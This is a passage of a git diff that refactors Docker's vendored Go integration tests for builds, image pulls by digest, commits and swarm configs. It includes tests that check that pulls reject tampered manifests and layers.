build.WithDockerfile(dockerFile)) + result := buildImage(name, build.WithDockerfile(dockerFile)) + result.Assert(c, icmd.Success) + c.Assert(strings.Count(result.Combined(), "Using cache"), checker.Equals, 1) +} + +// FIXME(vdemeester) should be a unit test +func (s *DockerSuite) TestBuildLineErrorOnBuild(c *check.C) { + 
name := "test_build_line_error_onbuild" + buildImage(name, build.WithDockerfile(`FROM busybox + ONBUILD + `)).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Dockerfile parse error line 2: ONBUILD requires at least one argument", + }) +} - _, out, err := buildImageWithOut("testbuildworkdircmd", dockerFile, true) - c.Assert(err, checker.IsNil) - c.Assert(strings.Count(out, "Using cache"), checker.Equals, 1) +// FIXME(vdemeester) should be a unit test +func (s *DockerSuite) TestBuildLineErrorUnknownInstruction(c *check.C) { + name := "test_build_line_error_unknown_instruction" + cli.Docker(cli.Build(name), build.WithDockerfile(`FROM busybox + RUN echo hello world + NOINSTRUCTION echo ba + RUN echo hello + ERROR + `)).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Dockerfile parse error line 3: unknown instruction: NOINSTRUCTION", + }) +} + +// FIXME(vdemeester) should be a unit test +func (s *DockerSuite) TestBuildLineErrorWithEmptyLines(c *check.C) { + name := "test_build_line_error_with_empty_lines" + cli.Docker(cli.Build(name), build.WithDockerfile(` + FROM busybox + + RUN echo hello world + + NOINSTRUCTION echo ba + + CMD ["/bin/init"] + `)).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Dockerfile parse error line 6: unknown instruction: NOINSTRUCTION", + }) +} + +// FIXME(vdemeester) should be a unit test +func (s *DockerSuite) TestBuildLineErrorWithComments(c *check.C) { + name := "test_build_line_error_with_comments" + cli.Docker(cli.Build(name), build.WithDockerfile(`FROM busybox + # This will print hello world + # and then ba + RUN echo hello world + NOINSTRUCTION echo ba + `)).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Dockerfile parse error line 5: unknown instruction: NOINSTRUCTION", + }) +} + +// #31957 +func (s *DockerSuite) TestBuildSetCommandWithDefinedShell(c *check.C) { + buildImageSuccessfully(c, "build1", build.WithDockerfile(` +FROM busybox +SHELL ["/bin/sh", "-c"] +`)) + buildImageSuccessfully(c, "build2", build.WithDockerfile(` +FROM 
build1 +CMD echo foo +`)) + + out, _ := dockerCmd(c, "inspect", "--format", "{{ json .Config.Cmd }}", "build2") + c.Assert(strings.TrimSpace(out), checker.Equals, `["/bin/sh","-c","echo foo"]`) +} + +// FIXME(vdemeester) should migrate to docker/cli tests +func (s *DockerSuite) TestBuildIidFile(c *check.C) { + tmpDir, err := ioutil.TempDir("", "TestBuildIidFile") + if err != nil { + c.Fatal(err) + } + defer os.RemoveAll(tmpDir) + tmpIidFile := filepath.Join(tmpDir, "iid") + + name := "testbuildiidfile" + // Use a Dockerfile with multiple stages to ensure we get the last one + cli.BuildCmd(c, name, + build.WithDockerfile(`FROM `+minimalBaseImage()+` AS stage1 +ENV FOO FOO +FROM `+minimalBaseImage()+` +ENV BAR BAZ`), + cli.WithFlags("--iidfile", tmpIidFile)) + + id, err := ioutil.ReadFile(tmpIidFile) + c.Assert(err, check.IsNil) + d, err := digest.Parse(string(id)) + c.Assert(err, check.IsNil) + c.Assert(d.String(), checker.Equals, getIDByName(c, name)) +} + +// FIXME(vdemeester) should migrate to docker/cli tests +func (s *DockerSuite) TestBuildIidFileCleanupOnFail(c *check.C) { + tmpDir, err := ioutil.TempDir("", "TestBuildIidFileCleanupOnFail") + if err != nil { + c.Fatal(err) + } + defer os.RemoveAll(tmpDir) + tmpIidFile := filepath.Join(tmpDir, "iid") + + err = ioutil.WriteFile(tmpIidFile, []byte("Dummy"), 0666) + c.Assert(err, check.IsNil) + + cli.Docker(cli.Build("testbuildiidfilecleanuponfail"), + build.WithDockerfile(`FROM `+minimalBaseImage()+` + RUN /non/existing/command`), + cli.WithFlags("--iidfile", tmpIidFile)).Assert(c, icmd.Expected{ + ExitCode: 1, + }) + _, err = os.Stat(tmpIidFile) + c.Assert(err, check.NotNil) + c.Assert(os.IsNotExist(err), check.Equals, true) } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_build_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_build_unix_test.go index 0205a927dd..8cad28f457 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_build_unix_test.go 
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_build_unix_test.go @@ -12,30 +12,33 @@ import ( "path/filepath" "regexp" "strings" + "syscall" "time" - "github.com/docker/docker/pkg/integration" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/cli/build" + "github.com/docker/docker/internal/test/fakecontext" "github.com/docker/go-units" "github.com/go-check/check" + "gotest.tools/icmd" ) func (s *DockerSuite) TestBuildResourceConstraintsAreUsed(c *check.C) { testRequires(c, cpuCfsQuota) name := "testbuildresourceconstraints" + buildLabel := "DockerSuite.TestBuildResourceConstraintsAreUsed" - ctx, err := fakeContext(` + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(` FROM hello-world:frozen RUN ["/hello"] - `, map[string]string{}) - c.Assert(err, checker.IsNil) - - _, _, err = dockerCmdInDir(c, ctx.Dir, "build", "--no-cache", "--rm=false", "--memory=64m", "--memory-swap=-1", "--cpuset-cpus=0", "--cpuset-mems=0", "--cpu-shares=100", "--cpu-quota=8000", "--ulimit", "nofile=42", "-t", name, ".") - if err != nil { - c.Fatal(err) - } + `)) + cli.Docker( + cli.Args("build", "--no-cache", "--rm=false", "--memory=64m", "--memory-swap=-1", "--cpuset-cpus=0", "--cpuset-mems=0", "--cpu-shares=100", "--cpu-quota=8000", "--ulimit", "nofile=42", "--label="+buildLabel, "-t", name, "."), + cli.InDir(ctx.Dir), + ).Assert(c, icmd.Success) - out, _ := dockerCmd(c, "ps", "-lq") + out := cli.DockerCmd(c, "ps", "-lq", "--filter", "label="+buildLabel).Combined() cID := strings.TrimSpace(out) type hostConfig struct { @@ -51,7 +54,7 @@ func (s *DockerSuite) TestBuildResourceConstraintsAreUsed(c *check.C) { cfg := inspectFieldJSON(c, cID, "HostConfig") var c1 hostConfig - err = json.Unmarshal([]byte(cfg), &c1) + err := json.Unmarshal([]byte(cfg), &c1) c.Assert(err, checker.IsNil, check.Commentf(cfg)) 
c.Assert(c1.Memory, checker.Equals, int64(64*1024*1024), check.Commentf("resource constraints not set properly for Memory")) @@ -64,7 +67,7 @@ func (s *DockerSuite) TestBuildResourceConstraintsAreUsed(c *check.C) { c.Assert(c1.Ulimits[0].Hard, checker.Equals, int64(42), check.Commentf("resource constraints not set properly for Ulimits")) // Make sure constraints aren't saved to image - dockerCmd(c, "run", "--name=test", name) + cli.DockerCmd(c, "run", "--name=test", name) cfg = inspectFieldJSON(c, "test", "HostConfig") @@ -85,7 +88,7 @@ func (s *DockerSuite) TestBuildAddChangeOwnership(c *check.C) { testRequires(c, DaemonIsLinux) name := "testbuildaddown" - ctx := func() *FakeContext { + ctx := func() *fakecontext.Fake { dockerfile := ` FROM busybox ADD foo /bar/ @@ -100,24 +103,20 @@ func (s *DockerSuite) TestBuildAddChangeOwnership(c *check.C) { } defer testFile.Close() - chownCmd := exec.Command("chown", "daemon:daemon", "foo") - chownCmd.Dir = tmpDir - out, _, err := runCommandWithOutput(chownCmd) - if err != nil { - c.Fatal(err, out) - } + icmd.RunCmd(icmd.Cmd{ + Command: []string{"chown", "daemon:daemon", "foo"}, + Dir: tmpDir, + }).Assert(c, icmd.Success) if err := ioutil.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte(dockerfile), 0644); err != nil { c.Fatalf("failed to open destination dockerfile: %v", err) } - return fakeContextFromDir(tmpDir) + return fakecontext.New(c, tmpDir) }() defer ctx.Close() - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatalf("build failed to complete for TestBuildAddChangeOwnership: %v", err) - } + buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx)) } // Test that an infinite sleep during a build is killed if the client disconnects. @@ -127,8 +126,12 @@ func (s *DockerSuite) TestBuildAddChangeOwnership(c *check.C) { // * Run a 1-year-long sleep from a docker build. 
// * When docker events sees container start, close the "docker build" command // * Wait for docker events to emit a dying event. +// +// TODO(buildkit): this test needs to be rewritten for buildkit. +// It has been manually tested positive. Confirmed issue: docker build output parsing. +// Potential issue: newEventObserver uses docker events, which is not hooked up to buildkit. func (s *DockerSuite) TestBuildCancellationKillsSleep(c *check.C) { - testRequires(c, DaemonIsLinux) + testRequires(c, DaemonIsLinux, TODOBuildkit) name := "testbuildcancellation" observer, err := newEventObserver(c) @@ -138,19 +141,23 @@ func (s *DockerSuite) TestBuildCancellationKillsSleep(c *check.C) { defer observer.Stop() // (Note: one year, will never finish) - ctx, err := fakeContext("FROM busybox\nRUN sleep 31536000", nil) - if err != nil { - c.Fatal(err) - } + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile("FROM busybox\nRUN sleep 31536000")) defer ctx.Close() buildCmd := exec.Command(dockerBinary, "build", "-t", name, ".") buildCmd.Dir = ctx.Dir stdoutBuild, err := buildCmd.StdoutPipe() + c.Assert(err, checker.IsNil) + if err := buildCmd.Start(); err != nil { c.Fatalf("failed to run build: %s", err) } + // always clean up + defer func() { + buildCmd.Process.Kill() + buildCmd.Wait() + }() matchCID := regexp.MustCompile("Running in (.+)") scanner := bufio.NewScanner(stdoutBuild) @@ -194,7 +201,7 @@ func (s *DockerSuite) TestBuildCancellationKillsSleep(c *check.C) { } // Get the exit status of `docker build`, check it exited because killed. 
- if err := buildCmd.Wait(); err != nil && !integration.IsKilled(err) { + if err := buildCmd.Wait(); err != nil && !isKilled(err) { c.Fatalf("wait failed during build run: %T %s", err, err) } @@ -205,3 +212,17 @@ func (s *DockerSuite) TestBuildCancellationKillsSleep(c *check.C) { // ignore, done } } + +func isKilled(err error) bool { + if exitErr, ok := err.(*exec.ExitError); ok { + status, ok := exitErr.Sys().(syscall.WaitStatus) + if !ok { + return false + } + // status.ExitStatus() is required on Windows because it does not + // implement Signal() nor Signaled(). Just check it had a bad exit + // status could mean it was killed (and in tests we do kill) + return (status.Signaled() && status.Signal() == os.Kill) || status.ExitStatus() != 0 + } + return false +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_by_digest_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_by_digest_test.go index c2d85461a8..006cf11e1a 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_by_digest_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_by_digest_test.go @@ -8,13 +8,16 @@ import ( "regexp" "strings" - "github.com/docker/distribution/digest" "github.com/docker/distribution/manifest/schema1" "github.com/docker/distribution/manifest/schema2" "github.com/docker/docker/api/types" - "github.com/docker/docker/pkg/integration/checker" - "github.com/docker/docker/pkg/stringutils" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/cli/build" "github.com/go-check/check" + "github.com/opencontainers/go-digest" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) var ( @@ -31,24 +34,23 @@ func setupImage(c *check.C) (digest.Digest, error) { func setupImageWithTag(c *check.C, tag string) (digest.Digest, error) { containerName := "busyboxbydigest" - dockerCmd(c, "run", "-e", "digest=1", "--name", 
containerName, "busybox") + // new file is committed because this layer is used for detecting malicious + // changes. if this was committed as empty layer it would be skipped on pull + // and malicious changes would never be detected. + cli.DockerCmd(c, "run", "-e", "digest=1", "--name", containerName, "busybox", "touch", "anewfile") // tag the image to upload it to the private registry repoAndTag := repoName + ":" + tag - out, _, err := dockerCmdWithError("commit", containerName, repoAndTag) - c.Assert(err, checker.IsNil, check.Commentf("image tagging failed: %s", out)) + cli.DockerCmd(c, "commit", containerName, repoAndTag) // delete the container as we don't need it any more - err = deleteContainer(containerName) - c.Assert(err, checker.IsNil) + cli.DockerCmd(c, "rm", "-fv", containerName) // push the image - out, _, err = dockerCmdWithError("push", repoAndTag) - c.Assert(err, checker.IsNil, check.Commentf("pushing the image to the private registry has failed: %s", out)) + out := cli.DockerCmd(c, "push", repoAndTag).Combined() // delete our local repo that we previously tagged - rmiout, _, err := dockerCmdWithError("rmi", repoAndTag) - c.Assert(err, checker.IsNil, check.Commentf("error deleting images prior to real test: %s", rmiout)) + cli.DockerCmd(c, "rmi", repoAndTag) matches := pushDigestRegex.FindStringSubmatch(out) c.Assert(matches, checker.HasLen, 2, check.Commentf("unable to parse digest from push output: %s", out)) @@ -193,10 +195,9 @@ func (s *DockerRegistrySuite) TestBuildByDigest(c *check.C) { // do the build name := "buildbydigest" - _, err = buildImage(name, fmt.Sprintf( + buildImageSuccessfully(c, name, build.WithDockerfile(fmt.Sprintf( `FROM %s - CMD ["/bin/echo", "Hello World"]`, imageReference), - true) + CMD ["/bin/echo", "Hello World"]`, imageReference))) c.Assert(err, checker.IsNil) // get the build's image id @@ -403,10 +404,12 @@ func (s *DockerRegistrySuite) TestInspectImageWithDigests(c *check.C) { c.Assert(err, checker.IsNil) 
c.Assert(imageJSON, checker.HasLen, 1) c.Assert(imageJSON[0].RepoDigests, checker.HasLen, 1) - c.Assert(stringutils.InSlice(imageJSON[0].RepoDigests, imageReference), checker.Equals, true) + assert.Check(c, is.Contains(imageJSON[0].RepoDigests, imageReference)) } func (s *DockerRegistrySuite) TestPsListContainersFilterAncestorImageByDigest(c *check.C) { + existingContainers := ExistingContainerIDs(c) + digest, err := setupImage(c) c.Assert(err, checker.IsNil, check.Commentf("error setting up image")) @@ -417,20 +420,17 @@ func (s *DockerRegistrySuite) TestPsListContainersFilterAncestorImageByDigest(c // build an image from it imageName1 := "images_ps_filter_test" - _, err = buildImage(imageName1, fmt.Sprintf( + buildImageSuccessfully(c, imageName1, build.WithDockerfile(fmt.Sprintf( `FROM %s - LABEL match me 1`, imageReference), true) - c.Assert(err, checker.IsNil) + LABEL match me 1`, imageReference))) // run a container based on that dockerCmd(c, "run", "--name=test1", imageReference, "echo", "hello") - expectedID, err := getIDByName("test1") - c.Assert(err, check.IsNil) + expectedID := getIDByName(c, "test1") // run a container based on the a descendant of that too dockerCmd(c, "run", "--name=test2", imageName1, "echo", "hello") - expectedID1, err := getIDByName("test2") - c.Assert(err, check.IsNil) + expectedID1 := getIDByName(c, "test2") expectedIDs := []string{expectedID, expectedID1} @@ -441,7 +441,7 @@ func (s *DockerRegistrySuite) TestPsListContainersFilterAncestorImageByDigest(c // Valid imageReference out, _ = dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=ancestor="+imageReference) - checkPsAncestorFilterOutput(c, out, imageReference, expectedIDs) + checkPsAncestorFilterOutput(c, RemoveOutputForExistingElements(out, existingContainers), imageReference, expectedIDs) } func (s *DockerRegistrySuite) TestDeleteImageByIDOnlyPulledByDigest(c *check.C) { @@ -533,7 +533,7 @@ func (s *DockerRegistrySuite) TestPullFailsWithAlteredManifest(c *check.C) { 
c.Assert(err, checker.IsNil, check.Commentf("error setting up image")) // Load the target manifest blob. - manifestBlob := s.reg.readBlobContents(c, manifestDigest) + manifestBlob := s.reg.ReadBlobContents(c, manifestDigest) var imgManifest schema2.Manifest err = json.Unmarshal(manifestBlob, &imgManifest) @@ -544,13 +544,13 @@ func (s *DockerRegistrySuite) TestPullFailsWithAlteredManifest(c *check.C) { // Move the existing data file aside, so that we can replace it with a // malicious blob of data. NOTE: we defer the returned undo func. - undo := s.reg.tempMoveBlobData(c, manifestDigest) + undo := s.reg.TempMoveBlobData(c, manifestDigest) defer undo() alteredManifestBlob, err := json.MarshalIndent(imgManifest, "", " ") c.Assert(err, checker.IsNil, check.Commentf("unable to encode altered image manifest to JSON")) - s.reg.writeBlobContents(c, manifestDigest, alteredManifestBlob) + s.reg.WriteBlobContents(c, manifestDigest, alteredManifestBlob) // Now try pulling that image by digest. We should get an error about // digest verification for the manifest digest. @@ -573,7 +573,7 @@ func (s *DockerSchema1RegistrySuite) TestPullFailsWithAlteredManifest(c *check.C c.Assert(err, checker.IsNil, check.Commentf("error setting up image")) // Load the target manifest blob. - manifestBlob := s.reg.readBlobContents(c, manifestDigest) + manifestBlob := s.reg.ReadBlobContents(c, manifestDigest) var imgManifest schema1.Manifest err = json.Unmarshal(manifestBlob, &imgManifest) @@ -586,13 +586,13 @@ func (s *DockerSchema1RegistrySuite) TestPullFailsWithAlteredManifest(c *check.C // Move the existing data file aside, so that we can replace it with a // malicious blob of data. NOTE: we defer the returned undo func. 
- undo := s.reg.tempMoveBlobData(c, manifestDigest) + undo := s.reg.TempMoveBlobData(c, manifestDigest) defer undo() alteredManifestBlob, err := json.MarshalIndent(imgManifest, "", " ") c.Assert(err, checker.IsNil, check.Commentf("unable to encode altered image manifest to JSON")) - s.reg.writeBlobContents(c, manifestDigest, alteredManifestBlob) + s.reg.WriteBlobContents(c, manifestDigest, alteredManifestBlob) // Now try pulling that image by digest. We should get an error about // digest verification for the manifest digest. @@ -615,7 +615,7 @@ func (s *DockerRegistrySuite) TestPullFailsWithAlteredLayer(c *check.C) { c.Assert(err, checker.IsNil) // Load the target manifest blob. - manifestBlob := s.reg.readBlobContents(c, manifestDigest) + manifestBlob := s.reg.ReadBlobContents(c, manifestDigest) var imgManifest schema2.Manifest err = json.Unmarshal(manifestBlob, &imgManifest) @@ -626,17 +626,17 @@ func (s *DockerRegistrySuite) TestPullFailsWithAlteredLayer(c *check.C) { // Move the existing data file aside, so that we can replace it with a // malicious blob of data. NOTE: we defer the returned undo func. - undo := s.reg.tempMoveBlobData(c, targetLayerDigest) + undo := s.reg.TempMoveBlobData(c, targetLayerDigest) defer undo() // Now make a fake data blob in this directory. - s.reg.writeBlobContents(c, targetLayerDigest, []byte("This is not the data you are looking for.")) + s.reg.WriteBlobContents(c, targetLayerDigest, []byte("This is not the data you are looking for.")) // Now try pulling that image by digest. We should get an error about // digest verification for the target layer digest. 
// Remove distribution cache to force a re-pull of the blobs - if err := os.RemoveAll(filepath.Join(dockerBasePath, "image", s.d.storageDriver, "distribution")); err != nil { + if err := os.RemoveAll(filepath.Join(testEnv.DaemonInfo.DockerRootDir, "image", s.d.StorageDriver(), "distribution")); err != nil { c.Fatalf("error clearing distribution cache: %v", err) } @@ -658,7 +658,7 @@ func (s *DockerSchema1RegistrySuite) TestPullFailsWithAlteredLayer(c *check.C) { c.Assert(err, checker.IsNil) // Load the target manifest blob. - manifestBlob := s.reg.readBlobContents(c, manifestDigest) + manifestBlob := s.reg.ReadBlobContents(c, manifestDigest) var imgManifest schema1.Manifest err = json.Unmarshal(manifestBlob, &imgManifest) @@ -669,17 +669,17 @@ func (s *DockerSchema1RegistrySuite) TestPullFailsWithAlteredLayer(c *check.C) { // Move the existing data file aside, so that we can replace it with a // malicious blob of data. NOTE: we defer the returned undo func. - undo := s.reg.tempMoveBlobData(c, targetLayerDigest) + undo := s.reg.TempMoveBlobData(c, targetLayerDigest) defer undo() // Now make a fake data blob in this directory. - s.reg.writeBlobContents(c, targetLayerDigest, []byte("This is not the data you are looking for.")) + s.reg.WriteBlobContents(c, targetLayerDigest, []byte("This is not the data you are looking for.")) // Now try pulling that image by digest. We should get an error about // digest verification for the target layer digest. 
// Remove distribution cache to force a re-pull of the blobs - if err := os.RemoveAll(filepath.Join(dockerBasePath, "image", s.d.storageDriver, "distribution")); err != nil { + if err := os.RemoveAll(filepath.Join(testEnv.DaemonInfo.DockerRootDir, "image", s.d.StorageDriver(), "distribution")); err != nil { c.Fatalf("error clearing distribution cache: %v", err) } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_commit_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_commit_test.go index 8008ae1716..79c5f73156 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_commit_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_commit_test.go @@ -3,22 +3,24 @@ package main import ( "strings" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" "github.com/go-check/check" ) func (s *DockerSuite) TestCommitAfterContainerIsDone(c *check.C) { - out, _ := dockerCmd(c, "run", "-i", "-a", "stdin", "busybox", "echo", "foo") + out := cli.DockerCmd(c, "run", "-i", "-a", "stdin", "busybox", "echo", "foo").Combined() cleanedContainerID := strings.TrimSpace(out) - dockerCmd(c, "wait", cleanedContainerID) + cli.DockerCmd(c, "wait", cleanedContainerID) - out, _ = dockerCmd(c, "commit", cleanedContainerID) + out = cli.DockerCmd(c, "commit", cleanedContainerID).Combined() cleanedImageID := strings.TrimSpace(out) - dockerCmd(c, "inspect", cleanedImageID) + cli.DockerCmd(c, "inspect", cleanedImageID) } func (s *DockerSuite) TestCommitWithoutPause(c *check.C) { @@ -39,7 +41,6 @@ func (s *DockerSuite) TestCommitWithoutPause(c *check.C) { //test commit a paused container should not unpause it after commit func (s *DockerSuite) TestCommitPausedContainer(c *check.C) { testRequires(c, DaemonIsLinux) - defer unpauseAllContainers() out, _ := dockerCmd(c, "run", "-i", 
"-d", "busybox") cleanedContainerID := strings.TrimSpace(out) @@ -54,9 +55,9 @@ func (s *DockerSuite) TestCommitPausedContainer(c *check.C) { } func (s *DockerSuite) TestCommitNewFile(c *check.C) { - dockerCmd(c, "run", "--name", "commiter", "busybox", "/bin/sh", "-c", "echo koye > /foo") + dockerCmd(c, "run", "--name", "committer", "busybox", "/bin/sh", "-c", "echo koye > /foo") - imageID, _ := dockerCmd(c, "commit", "commiter") + imageID, _ := dockerCmd(c, "commit", "committer") imageID = strings.TrimSpace(imageID) out, _ := dockerCmd(c, "run", imageID, "cat", "/foo") @@ -76,7 +77,7 @@ func (s *DockerSuite) TestCommitHardlink(c *check.C) { imageID, _ := dockerCmd(c, "commit", "hardlinks", "hardlinks") imageID = strings.TrimSpace(imageID) - secondOutput, _ := dockerCmd(c, "run", "-t", "hardlinks", "ls", "-di", "file1", "file2") + secondOutput, _ := dockerCmd(c, "run", "-t", imageID, "ls", "-di", "file1", "file2") chunks = strings.Split(strings.TrimSpace(secondOutput), " ") inode = chunks[0] @@ -90,7 +91,7 @@ func (s *DockerSuite) TestCommitTTY(c *check.C) { imageID, _ := dockerCmd(c, "commit", "tty", "ttytest") imageID = strings.TrimSpace(imageID) - dockerCmd(c, "run", "ttytest", "/bin/ls") + dockerCmd(c, "run", imageID, "/bin/ls") } func (s *DockerSuite) TestCommitWithHostBindMount(c *check.C) { @@ -100,7 +101,7 @@ func (s *DockerSuite) TestCommitWithHostBindMount(c *check.C) { imageID, _ := dockerCmd(c, "commit", "bind-commit", "bindtest") imageID = strings.TrimSpace(imageID) - dockerCmd(c, "run", "bindtest", "true") + dockerCmd(c, "run", imageID, "true") } func (s *DockerSuite) TestCommitChange(c *check.C) { @@ -121,11 +122,21 @@ func (s *DockerSuite) TestCommitChange(c *check.C) { "test", "test-commit") imageID = strings.TrimSpace(imageID) + expectedEnv := "[DEBUG=true test=1 PATH=/foo]" + // bug fixed in 1.36, add min APi >= 1.36 requirement + // PR record https://github.com/moby/moby/pull/35582 + if versions.GreaterThan(testEnv.DaemonAPIVersion(), "1.35") && 
testEnv.OSType != "windows" { + // The ordering here is due to `PATH` being overridden from the container's + // ENV. On windows, the container doesn't have a `PATH` ENV variable so + // the ordering is the same as the cli. + expectedEnv = "[PATH=/foo DEBUG=true test=1]" + } + prefix, slash := getPrefixAndSlashFromDaemonPlatform() - prefix = strings.ToUpper(prefix) // Force C: as that's how WORKDIR is normalised on Windows + prefix = strings.ToUpper(prefix) // Force C: as that's how WORKDIR is normalized on Windows expected := map[string]string{ "Config.ExposedPorts": "map[8080/tcp:{}]", - "Config.Env": "[DEBUG=true test=1 PATH=/foo]", + "Config.Env": expectedEnv, "Config.Labels": "map[foo:bar]", "Config.Cmd": "[/bin/sh]", "Config.WorkingDir": prefix + slash + "opt", diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_config_create_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_config_create_test.go new file mode 100644 index 0000000000..b823254874 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_config_create_test.go @@ -0,0 +1,131 @@ +// +build !windows + +package main + +import ( + "io/ioutil" + "os" + "strings" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/integration-cli/checker" + "github.com/go-check/check" +) + +func (s *DockerSwarmSuite) TestConfigCreate(c *check.C) { + d := s.AddDaemon(c, true, true) + + testName := "test_config" + id := d.CreateConfig(c, swarm.ConfigSpec{ + Annotations: swarm.Annotations{ + Name: testName, + }, + Data: []byte("TESTINGDATA"), + }) + c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("configs: %s", id)) + + config := d.GetConfig(c, id) + c.Assert(config.Spec.Name, checker.Equals, testName) +} + +func (s *DockerSwarmSuite) TestConfigCreateWithLabels(c *check.C) { + d := s.AddDaemon(c, true, true) + + testName := "test_config" + id := d.CreateConfig(c, swarm.ConfigSpec{ + Annotations: swarm.Annotations{ + Name: 
testName, + Labels: map[string]string{ + "key1": "value1", + "key2": "value2", + }, + }, + Data: []byte("TESTINGDATA"), + }) + c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("configs: %s", id)) + + config := d.GetConfig(c, id) + c.Assert(config.Spec.Name, checker.Equals, testName) + c.Assert(len(config.Spec.Labels), checker.Equals, 2) + c.Assert(config.Spec.Labels["key1"], checker.Equals, "value1") + c.Assert(config.Spec.Labels["key2"], checker.Equals, "value2") +} + +// Test case for 28884 +func (s *DockerSwarmSuite) TestConfigCreateResolve(c *check.C) { + d := s.AddDaemon(c, true, true) + + name := "test_config" + id := d.CreateConfig(c, swarm.ConfigSpec{ + Annotations: swarm.Annotations{ + Name: name, + }, + Data: []byte("foo"), + }) + c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("configs: %s", id)) + + fake := d.CreateConfig(c, swarm.ConfigSpec{ + Annotations: swarm.Annotations{ + Name: id, + }, + Data: []byte("fake foo"), + }) + c.Assert(fake, checker.Not(checker.Equals), "", check.Commentf("configs: %s", fake)) + + out, err := d.Cmd("config", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, name) + c.Assert(out, checker.Contains, fake) + + out, err = d.Cmd("config", "rm", id) + c.Assert(out, checker.Contains, id) + + // Fake one will remain + out, err = d.Cmd("config", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Not(checker.Contains), name) + c.Assert(out, checker.Contains, fake) + + // Remove based on name prefix of the fake one + // (which is the same as the ID of foo one) should not work + // as search is only done based on: + // - Full ID + // - Full Name + // - Partial ID (prefix) + out, err = d.Cmd("config", "rm", id[:5]) + c.Assert(out, checker.Not(checker.Contains), id) + out, err = d.Cmd("config", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Not(checker.Contains), name) + c.Assert(out, checker.Contains, fake) + + // Remove based on ID prefix of the fake one should 
succeed + out, err = d.Cmd("config", "rm", fake[:5]) + c.Assert(out, checker.Contains, fake[:5]) + out, err = d.Cmd("config", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Not(checker.Contains), name) + c.Assert(out, checker.Not(checker.Contains), id) + c.Assert(out, checker.Not(checker.Contains), fake) +} + +func (s *DockerSwarmSuite) TestConfigCreateWithFile(c *check.C) { + d := s.AddDaemon(c, true, true) + + testFile, err := ioutil.TempFile("", "configCreateTest") + c.Assert(err, checker.IsNil, check.Commentf("failed to create temporary file")) + defer os.Remove(testFile.Name()) + + testData := "TESTINGDATA" + _, err = testFile.Write([]byte(testData)) + c.Assert(err, checker.IsNil, check.Commentf("failed to write to temporary file")) + + testName := "test_config" + out, err := d.Cmd("config", "create", testName, testFile.Name()) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "", check.Commentf(out)) + + id := strings.TrimSpace(out) + config := d.GetConfig(c, id) + c.Assert(config.Spec.Name, checker.Equals, testName) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_config_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_config_test.go deleted file mode 100644 index 1d5e5ad3db..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_config_test.go +++ /dev/null @@ -1,140 +0,0 @@ -package main - -import ( - "io/ioutil" - "net/http" - "net/http/httptest" - "os" - "os/exec" - "path/filepath" - "runtime" - - "github.com/docker/docker/api" - "github.com/docker/docker/dockerversion" - "github.com/docker/docker/pkg/homedir" - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -func (s *DockerSuite) TestConfigHTTPHeader(c *check.C) { - testRequires(c, UnixCli) // Can't set/unset HOME on windows right now - // We either need a level of Go that supports Unsetenv (for cases - // when HOME/USERPROFILE isn't set), 
